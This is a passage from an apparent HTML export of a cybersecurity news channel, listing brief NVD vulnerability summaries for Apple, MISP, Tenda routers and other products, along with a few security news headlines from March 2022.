<strong>‼ CVE-2022-22627 ‼</strong><br><br><code>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22627">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39234">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:23:04">
17:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-0547 ‼</strong><br><br><code>OpenVPN 2.1 until v2.4.12 and v2.5.6 may enable authentication bypass in external authentication plug-ins when more than one of them makes use of deferred authentication replies, which allows an external user to be granted access with only partially correct credentials.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-0547">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39235">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:23:06">
17:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-22578 ‼</strong><br><br><code>A logic issue was addressed with improved validation. This issue is fixed in tvOS 15.3, iOS 15.3 and iPadOS 15.3, watchOS 8.4, macOS Monterey 12.2. A malicious application may be able to gain root privileges.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22578">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39236">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:23:08">
17:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-22607 ‼</strong><br><br><code>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22607">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39237">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:23:10">
17:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-25607 ‼</strong><br><br><code>Authenticated (author or higher user role) SQL Injection (SQLi) vulnerability discovered in FV Flowplayer Video Player WordPress plugin (versions &lt;= 7.5.15.727).</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25607">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39238">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:28:46">
17:28
       </div>

       <div class="text">
<strong>‼ CVE-2022-22652 ‼</strong><br><br><code>The GSMA authentication panel could be presented on the lock screen. The issue was resolved by requiring device unlock to interact with the GSMA authentication panel. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access may be able to view and modify the carrier account information and settings from the lock screen.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22652">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39239">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:28:47">
17:28
       </div>

       <div class="text">
<strong>‼ CVE-2022-22600 ‼</strong><br><br><code>The issue was addressed with improved permissions logic. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A malicious application may be able to bypass certain Privacy preferences.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22600">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39240">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:28:48">
17:28
       </div>

       <div class="text">
<strong>‼ CVE-2022-22651 ‼</strong><br><br><code>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.3. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22651">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39241">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:28:50">
17:28
       </div>

       <div class="text">
<strong>‼ CVE-2022-27245 ‼</strong><br><br><code>An issue was discovered in MISP before 2.4.156. app/Model/Server.php does not restrict generateServerSettings to the CLI. This could lead to SSRF.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27245">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39242">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:28:51">
17:28
       </div>

       <div class="text">
<strong>‼ CVE-2022-27246 ‼</strong><br><br><code>An issue was discovered in MISP before 2.4.156. An SVG org logo (which may contain JavaScript) is not forbidden by default.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27246">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39243">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:28:53">
17:28
       </div>

       <div class="text">
<strong>‼ CVE-2021-27789 ‼</strong><br><br><code>The Web application of Brocade Fabric OS before versions Brocade Fabric OS v9.0.1a and v8.2.3a contains debug statements that expose sensitive information to the program&apos;s standard output device. An attacker who has compromised the FOS system may utilize this weakness to capture sensitive information, such as user credentials.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27789">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39244">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:28:54">
17:28
       </div>

       <div class="text">
<strong>‼ CVE-2022-22592 ‼</strong><br><br><code>A logic issue was addressed with improved state management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may prevent Content Security Policy from being enforced.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22592">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39245">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:28:55">
17:28
       </div>

       <div class="text">
<strong>‼ CVE-2022-27244 ‼</strong><br><br><code>An issue was discovered in MISP before 2.4.156. A malicious site administrator could store an XSS payload in the custom auth name. This would be executed each time the administrator modifies a user.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27244">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39246">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:28:56">
17:28
       </div>

       <div class="text">
<strong>‼ CVE-2022-24091 ‼</strong><br><br><code>Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious font file.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24091">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39247">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:28:57">
17:28
       </div>

       <div class="text">
<strong>‼ CVE-2021-4031 ‼</strong><br><br><code>Syltek application before its 10.22.00 version, does not correctly check that a product ID has a valid payment associated to it. This could allow an attacker to forge a request and bypass the payment system by marking items as payed without any verification.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-4031">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39248">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:28:58">
17:28
       </div>

       <div class="text">
<strong>‼ CVE-2022-22633 ‼</strong><br><br><code>A memory corruption issue was addressed with improved state management. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, macOS Monterey 12.3. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22633">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39249">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:28:58">
17:28
       </div>

       <div class="text">
<strong>‼ CVE-2022-22634 ‼</strong><br><br><code>A buffer overflow was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4. A malicious application may be able to execute arbitrary code with kernel privileges.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22634">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39250">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:28:59">
17:28
       </div>

       <div class="text">
<strong>‼ CVE-2022-22591 ‼</strong><br><br><code>A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22591">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39251">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:29:00">
17:29
       </div>

       <div class="text">
<strong>‼ CVE-2020-25193 ‼</strong><br><br><code>By having access to the hard-coded cryptographic key for GE Reason RT430, RT431 &amp; RT434 GNSS clocks in firmware versions prior to version 08A06, attackers would be able to intercept and decrypt encrypted traffic through an HTTPS connection.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-25193">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39252">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:29:04">
17:29
       </div>

       <div class="text">
<strong>‼ CVE-2022-22620 ‼</strong><br><br><code>A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22620">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39253">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:29:05">
17:29
       </div>

       <div class="text">
<strong>‼ CVE-2022-22584 ‼</strong><br><br><code>A memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.3, iOS 15.3 and iPadOS 15.3, watchOS 8.4, macOS Monterey 12.2. Processing a maliciously crafted file may lead to arbitrary code execution.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22584">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39254">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:29:08">
17:29
       </div>

       <div class="text">
<strong>‼ CVE-2022-22604 ‼</strong><br><br><code>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22604">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39255">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:29:10">
17:29
       </div>

       <div class="text">
<strong>‼ CVE-2022-22644 ‼</strong><br><br><code>A privacy issue existed in the handling of Contact cards. This was addressed with improved state management. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to access information about a user&apos;s contacts.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22644">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39256">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:29:12">
17:29
       </div>

       <div class="text">
<strong>‼ CVE-2022-22621 ‼</strong><br><br><code>This issue was addressed with improved checks. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22621">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39257">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:29:13">
17:29
       </div>

       <div class="text">
<strong>❌ Agencies Warn on Satellite Hacks &amp; GPS Jamming Affecting Airplanes, Critical Infrastructure ❌</strong><br><br><code>The Russian invasion of Ukraine has coincided with the jamming of airplane navigation systems and hacks on the SATCOM networks that empower critical infrastructure.</code><br><br><a href="https://threatpost.com/agencies-satellite-hacks-gps-jamming-airplanes-critical-infrastructure/178993/">📖 Read</a><br><br>via &quot;<em>Threat Post</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39258">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:33:43">
17:33
       </div>

       <div class="text">
<strong>‼ CVE-2022-22665 ‼</strong><br><br><code>A logic issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to gain root privileges.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22665">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39259">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:33:45">
17:33
       </div>

       <div class="text">
<strong>‼ CVE-2020-25182 ‼</strong><br><br><code>Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x searches for and loads DLLs as dynamic libraries. Uncontrolled loading of dynamic libraries could allow a local, unauthenticated attacker to execute arbitrary code. This vulnerability only affects ISaGRAF Runtime when running on Microsoft Windows systems.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-25182">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39260">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 17:36:43">
17:36
       </div>

       <div class="text">
<strong>‼ CVE-2022-22640 ‼</strong><br><br><code>A memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. An application may be able to execute arbitrary code with kernel privileges.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22640">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39261">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 18:44:31">
18:44
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>🕴 Code-Sabotage Incident in Protest of Ukraine War Exposed Open Source Risks 🕴</strong><br><br><code>The maintainer of a widely used npm module served up an unwelcome surprise for developers.</code><br><br><a href="https://www.darkreading.com/application-security/recent-code-sabotage-incident-latest-to-highlight-code-dependency-risks">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39262">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:14:03">
19:14
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>🕴 Half of Orgs Use Web Application Firewalls to Paper Over Flaws 🕴</strong><br><br><code>WAFs remain a popular backfill for complex and fraught patch management.</code><br><br><a href="https://www.darkreading.com/tech-trends/half-of-orgs-use-web-application-firewalls-to-paper-over-flaws">📖 Read</a><br><br>via &quot;<em>Dark Reading</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39263">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:22:47">
19:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-25453 ‼</strong><br><br><code>Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the time parameter in the saveParentControlInfo function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25453">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39264">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:22:49">
19:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-25458 ‼</strong><br><br><code>Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the cmdinput parameter in the exeCommand function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25458">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39265">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:22:52">
19:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-25461 ‼</strong><br><br><code>Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the startip parameter in the SetPptpServerCfg function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25461">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39266">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:22:53">
19:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-25441 ‼</strong><br><br><code>Tenda AC9 v15.03.2.21 was discovered to contain a remote command execution (RCE) vulnerability via the vlanid parameter in the SetIPTVCfg function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25441">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39267">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:22:55">
19:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-25452 ‼</strong><br><br><code>Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the URLs parameter in the saveParentControlInfo function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25452">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39268">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:22:57">
19:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-25456 ‼</strong><br><br><code>Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the security_5g parameter in the WifiBasicSet function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25456">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39269">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:22:58">
19:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-25455 ‼</strong><br><br><code>Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the SetIpMacBind function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25455">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39270">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:22:59">
19:22
       </div>

       <div class="text">
<strong>‼ CVE-2022-25454 ‼</strong><br><br><code>Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the loginpwd parameter in the SetFirewallCfg function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25454">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39271">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:23:00">
19:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-25439 ‼</strong><br><br><code>Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the list parameter in the SetIpMacBind function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25439">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39272">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:23:03">
19:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-25457 ‼</strong><br><br><code>Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the ntpserver parameter in the SetSysTimeCfg function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25457">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39273">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:23:04">
19:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-25449 ‼</strong><br><br><code>Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the deviceId parameter in the saveParentControlInfo function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25449">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39274">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:23:06">
19:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-25427 ‼</strong><br><br><code>Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the schedendtime parameter in the openSchedWifi function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25427">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39275">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:23:09">
19:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-25429 ‼</strong><br><br><code>Tenda AC9 v15.03.2.21 was discovered to contain a buffer overflow via the time parameter in the saveparentcontrolinfo function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25429">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39276">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:23:11">
19:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-25440 ‼</strong><br><br><code>Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the ntpserver parameter in the SetSysTimeCfg function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25440">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39277">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:23:14">
19:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-25451 ‼</strong><br><br><code>Tenda AC6 V15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the setstaticroutecfg function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25451">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39278">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:23:15">
19:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-25459 ‼</strong><br><br><code>Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the S1 parameter in the SetSysTimeCfg function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25459">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39279">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:23:18">
19:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-25445 ‼</strong><br><br><code>Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the time parameter in the PowerSaveSet function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25445">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39280">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:23:20">
19:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-25428 ‼</strong><br><br><code>Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the deviceId parameter in the saveparentcontrolinfo function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25428">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39281">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:23:22">
19:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-25447 ‼</strong><br><br><code>Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the schedendtime parameter in the openSchedWifi function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25447">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39282">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 19:23:25">
19:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-25431 ‼</strong><br><br><code>Tenda AC9 v15.03.2.21 was discovered to contain multiple stack overflows via the NPTR, V12, V10 and V11 parameter in the Formsetqosband function.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25431">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix" id="message39283">

      <div class="pull_left userpic_wrap">

       <div class="userpic userpic4" style="width: 42px; height: 42px">

        <div class="initials" style="line-height: 42px">
?
        </div>

       </div>

      </div>

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 21:23:14">
21:23
       </div>

       <div class="from_name">
🛡 Cybersecurity &amp; Privacy news 🛡 
       </div>

       <div class="text">
<strong>‼ CVE-2022-26265 ‼</strong><br><br><code>Contao Managed Edition v1.5.0 was discovered to contain a remote command execution (RCE) vulnerability via the component php_cli parameter.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26265">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39284">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 21:23:16">
21:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-25581 ‼</strong><br><br><code>Classcms v2.5 and below contains an arbitrary file upload via the component \class\classupload. This vulnerability allows attackers to execute code injection via a crafted .txt file.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25581">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39285">

      <div class="body">

       <div class="pull_right date details" title="18.03.2022 21:23:17">
21:23
       </div>

       <div class="text">
<strong>‼ CVE-2022-26267 ‼</strong><br><br><code>Piwigo v12.2.0 was discovered to contain an information leak via the action parameter in /admin/maintenance_actions.php.</code><br><br><a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26267">📖 Read</a><br><br>via &quot;<em>National Vulnerability Database</em>&quot;.
       </div>

      </div>

     </div>

     <div class="message default clearfix joined" id="message39286">

